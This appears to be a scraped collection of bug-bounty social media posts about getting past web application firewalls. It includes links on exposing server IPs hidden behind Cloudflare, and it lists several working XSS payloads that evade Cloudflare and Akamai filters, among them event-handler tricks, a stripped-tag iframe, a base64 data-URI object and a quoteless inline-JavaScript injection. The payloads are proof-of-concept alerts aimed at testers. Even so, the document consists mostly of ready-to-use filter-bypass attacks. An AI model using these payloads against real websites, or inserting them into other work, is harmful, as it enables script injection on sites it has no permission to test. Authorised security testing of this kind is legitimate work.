cloudflare bypass material
https://blog.christophetd.fr/bypassing-cloudflare-using-internet-wide-scan-data/
http://www.chokepoint.net/2017/10/exposing-server-ips-behind-cloudflare.html
http://www.securityidiots.com/Web-Pentest/Information-Gathering/Cloudflare-Bypass/Part-2-Cloudflare-Security-Bypass.html
https://medium.com/secure-hacker/bypass-cloudflare-protection-get-subdomains-ofa-website-2cb1d749c510
#web
#pentest
#bypass
#sqli
#xss
@sec_nerd_en
Christophe Tafani-Dereeper
CloudFlair: Bypassing Cloudflare using Internet-wide scan data - Christophe Tafani-Dereeper
Cloudflare is a service that acts as a middleman between a website and its end users, protecting it from various attacks. Unfortunately, those websites are often poorly configured, allowing an attacker to entirely bypass Cloudflare and run DDoS attacks or…
Cloudflare XSS Bypass Payload
<svg%0Aonauxclick=0;[1].some(confirm)//
#Cloudflare #bugbounty #bugbountytips #WAF #Xss
Akamai WAF XSS Payload:
<details onauxclick=confirm`xss`></details>
Right-Click on 'Details', XSS will be fired.
#bugbountytips #bugbounty #xss
CSV Injection: http://ghostlulz.com/csv-injection/
ClickJacking: http://ghostlulz.com/clickjacking/
Exposed Firebase DB: http://ghostlulz.com/google-exposed-firebase-database/
Config Files: http://ghostlulz.com/exposed-log-and-configuration-files/
Kubernetes API: http://ghostlulz.com/exposed-kubernetes-api/
#bugbounty #bugbountytips #bugbountytip #redteam #pentest #infosec #xss
Ghostlulz
CSV Injection - Ghostlulz
How to use CSV injection, AKA formula injection, to embed a malicious payload into a spreadsheet.
XSS filter bypass using stripped </p> tag to obfuscate.
P2 Stored XSS $1500 on a private bug bounty program.
XSS Payload:
<</p>iframe src=javascript:alert()//
#xss #bugbountytip #bugbountytips #bugbounty
XSS payload in a JavaScript application.
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydGBZMDAwYDwvc2NyaXB0Pg=='></object>
#xss #payload #payloads #bugbountytips
#XSS on twitter
https://medium.com/bugbountywriteup/making-an-xss-triggered-by-csp-bypass-on-twitter-561f107be3e5
15.9k views
-
XSS on a big bank's payment gateway
https://medium.com/bugbountywriteup/cross-site-scripting-on-a-big-banks-payment-gateway-a986a2ba5d7
5.7k views
-
Why I am banned from HackerOne
https://medium.com/@kenanistaken/why-im-banned-from-hackerone-a6d8cffe2286
6.1k views
-
Sop Bypass
https://medium.com/bugbountywriteup/sop-bypass-ecae7f4a5c00
Medium
Making an XSS triggered by CSP bypass on Twitter.
Hi there,
quoteless #XSS filter bypass (removing HTML chars) in an inline JS function with multiple params
Normal:
/page?x=1&y=2&z=3
↓
<body onload="func('1', '2', '3')">
XSS:
/page?x=1&y=%5C&z=);alert(1);//
↓
<body onload="func('1', '\', ');alert(1);//'">
please note and share;
blocked:
onauxclick=confirm(2)
bypassed:
onauxclick=[2].some(confirm)
#XSS #WAF #WAFBypass #bugbountytips #security #infosec #hacking